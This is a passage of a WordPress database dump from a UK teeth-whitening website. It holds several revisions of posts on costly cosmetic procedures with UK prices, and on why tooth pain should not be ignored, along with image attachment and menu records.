stories:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/cheap-implants-vs-expensive-implants\" data-type=\"post\" data-id=\"218\">Cheap implants vs expensive implants</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile\" data-type=\"page\" data-id=\"127\">How to Achieve the Perfect Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/\" data-type=\"page\" data-id=\"20\">Welcome to a whiter smile</a></li></ul>\n<!-- /wp:list -->','Most Expensive Cosmetic Procedures','','inherit','closed','closed','','221-autosave-v1','','','2021-05-28 10:28:38','2021-05-28 10:28:38','',221,'https://teethwhiteningproduct.co.uk/221-autosave-v1',0,'revision','',0),(226,1,'2021-05-28 10:28:40','2021-05-28 10:28:40','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Our stories:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/cheap-implants-vs-expensive-implants\" data-type=\"post\" data-id=\"218\">Cheap implants vs expensive implants</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile\" data-type=\"page\" data-id=\"127\">How to Achieve the Perfect Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/\" data-type=\"page\" data-id=\"20\">Welcome to a whiter smile</a></li></ul>\n<!-- /wp:list -->','Most Expensive Cosmetic Procedures','','inherit','closed','closed','','221-revision-v1','','','2021-05-28 10:28:40','2021-05-28 10:28:40','',221,'https://teethwhiteningproduct.co.uk/221-revision-v1',0,'revision','',0),(227,1,'2021-05-28 10:31:43','2021-05-28 10:31:43',' ','','','publish','closed','closed','','227','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=227',9,'nav_menu_item','',0),(234,1,'2021-07-20 07:45:58','2021-07-20 07:45:58','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because tooth pain may go away doesn’t mean that the problem has disappeared too. When experiencing tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for day-to-day duties to be carries out, such as:\r\n<ul>\r\n <li><strong>Eating</strong></li>\r\n <li><strong>Talking</strong></li>\r\n <li><strong>Drinking</strong></li>\r\n <li><strong>Exercising</strong></li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than others. Common causes of tooth pain can range from:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\nTooth pain can be very <strong>sharp, painful and a constant ache</strong> that has links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile some tooth pain may be a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"232\" height=\"348\" />\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking painkillers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious from being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or infection then the person must seek dental help to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li><strong>Neglect</strong></li>\r\n <li><strong>Depression</strong></li>\r\n <li><strong>Lack of sleep</strong></li>\r\n <li><strong>Eating disorders</strong></li>\r\n <li><strong>Medication dependency</strong></li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','publish','closed','closed','','the-dangers-of-ignoring-tooth-pain','','','2021-07-20 08:43:45','2021-07-20 08:43:45','',0,'https://teethwhiteningproduct.co.uk/?p=234',0,'post','',0),(235,1,'2021-07-20 07:42:41','2021-07-20 07:42:41','tooth pain','tooth pain','','inherit','closed','closed','','teeth-5536858_1920','','','2021-07-20 07:42:54','2021-07-20 07:42:54','',234,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg',0,'attachment','image/jpeg',0),(236,1,'2021-07-20 07:43:12','2021-07-20 07:43:12','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because a tooth pain may go away that doesn’t mean that the problem has disappeared too. When experiencing a tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for da-to-day duties to be carries out, such as:\r\n<ul>\r\n <li>Eating</li>\r\n <li>Talking</li>\r\n <li>Drinking</li>\r\n <li>Exercising</li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than the others. Common causes of tooth pain <a href=\"https://my.clevelandclinic.org/health/diseases/10957-toothache#symptoms-and-causes\" target=\"_blank\" rel=\"noopener\">can range from</a>:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\nTooth pain can be very sharp, painful and a constant ache that have links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile it is possible some tooth pain is a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking pain killers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li>Neglect</li>\r\n <li>Depression</li>\r\n <li>Lack of sleep</li>\r\n <li>Eating disorders</li>\r\n <li>Medication dependency</li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 07:43:12','2021-07-20 07:43:12','',234,'https://teethwhiteningproduct.co.uk/?p=236',0,'revision','',0),(237,1,'2021-07-20 07:44:22','2021-07-20 07:44:22','tooth pain','tooth pain','','inherit','closed','closed','','pexels-cedric-fauntleroy-4270088','','','2021-07-20 07:44:36','2021-07-20 07:44:36','',234,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088.jpg',0,'attachment','image/jpeg',0),(238,1,'2021-07-20 07:44:59','2021-07-20 07:44:59','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because a tooth pain may go away that doesn’t mean that the problem has disappeared too. When experiencing a tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for da-to-day duties to be carries out, such as:\r\n<ul>\r\n <li>Eating</li>\r\n <li>Talking</li>\r\n <li>Drinking</li>\r\n <li>Exercising</li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than the others. Common causes of tooth pain <a href=\"https://my.clevelandclinic.org/health/diseases/10957-toothache#symptoms-and-causes\" target=\"_blank\" rel=\"noopener\">can range from</a>:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\n<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"331\" height=\"496\" /></a>\r\n\r\nTooth pain can be very sharp, painful and a constant ache that have links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile it is possible some tooth pain is a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking pain killers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li>Neglect</li>\r\n <li>Depression</li>\r\n <li>Lack of sleep</li>\r\n <li>Eating disorders</li>\r\n <li>Medication dependency</li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 07:44:59','2021-07-20 07:44:59','',234,'https://teethwhiteningproduct.co.uk/?p=238',0,'revision','',0),(239,1,'2021-07-20 07:45:09','2021-07-20 07:45:09','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because a tooth pain may go away that doesn’t mean that the problem has disappeared too. When experiencing a tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for da-to-day duties to be carries out, such as:\r\n<ul>\r\n <li>Eating</li>\r\n <li>Talking</li>\r\n <li>Drinking</li>\r\n <li>Exercising</li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than the others. Common causes of tooth pain <a href=\"https://my.clevelandclinic.org/health/diseases/10957-toothache#symptoms-and-causes\" target=\"_blank\" rel=\"noopener\">can range from</a>:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\n<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"215\" height=\"322\" /></a>\r\n\r\nTooth pain can be very sharp, painful and a constant ache that have links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile it is possible some tooth pain is a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking pain killers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li>Neglect</li>\r\n <li>Depression</li>\r\n <li>Lack of sleep</li>\r\n <li>Eating disorders</li>\r\n <li>Medication dependency</li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 07:45:09','2021-07-20 07:45:09','',234,'https://teethwhiteningproduct.co.uk/?p=239',0,'revision','',0),(240,1,'2021-07-20 07:45:58','2021-07-20 07:45:58','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because a tooth pain may go away that doesn’t mean that the problem has disappeared too. When experiencing a tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for da-to-day duties to be carries out, such as:\r\n<ul>\r\n <li>Eating</li>\r\n <li>Talking</li>\r\n <li>Drinking</li>\r\n <li>Exercising</li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than the others. Common causes of tooth pain can range from:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\n<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"215\" height=\"322\" /></a>\r\n\r\nTooth pain can be very sharp, painful and a constant ache that have links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile it is possible some tooth pain is a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking pain killers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li>Neglect</li>\r\n <li>Depression</li>\r\n <li>Lack of sleep</li>\r\n <li>Eating disorders</li>\r\n <li>Medication dependency</li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 07:45:58','2021-07-20 07:45:58','',234,'https://teethwhiteningproduct.co.uk/?p=240',0,'revision','',0),(241,1,'2021-07-20 08:20:44','2021-07-20 08:20:44','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because a tooth pain may go away that doesn’t mean that the problem has disappeared too. When experiencing a tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for day-to-day duties to be carries out, such as:\r\n<ul>\r\n <li><strong>Eating</strong></li>\r\n <li><strong>Talking</strong></li>\r\n <li><strong>Drinking</strong></li>\r\n <li><strong>Exercising</strong></li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than the others. Common causes of tooth pain can range from:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\n<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"215\" height=\"322\" /></a>\r\n\r\nTooth pain can be very<strong> sharp, painful and a constant ache</strong> that have links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile it is possible some tooth pain is a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking pain killers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li><strong>Neglect</strong></li>\r\n <li><strong>Depression</strong></li>\r\n <li><strong>Lack of sleep</strong></li>\r\n <li><strong>Eating disorders</strong></li>\r\n <li><strong>Medication dependency</strong></li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 08:20:44','2021-07-20 08:20:44','',234,'https://teethwhiteningproduct.co.uk/?p=241',0,'revision','',0),(242,1,'2021-07-20 08:42:15','2021-07-20 08:42:15','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\nJust because tooth pain may go away doesn’t mean that the problem has disappeared too. When experiencing tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\n\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for day-to-day duties to be carries out, such as:\n<ul>\n <li><strong>Eating</strong></li>\n <li><strong>Talking</strong></li>\n <li><strong>Drinking</strong></li>\n <li><strong>Exercising</strong></li>\n</ul>\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than others. Common causes of tooth pain can range from:\n<ul>\n <li>Tooth decay</li>\n <li>Broken tooth</li>\n <li>Gum infection</li>\n <li>Eruption</li>\n <li>Repetitive chewing or clenching</li>\n</ul>\nTooth pain can be very <strong>sharp, painful and a constant ache</strong> that has links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\">gingivitis and periodontitis</a>.\n\nWhile some tooth pain may be a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their 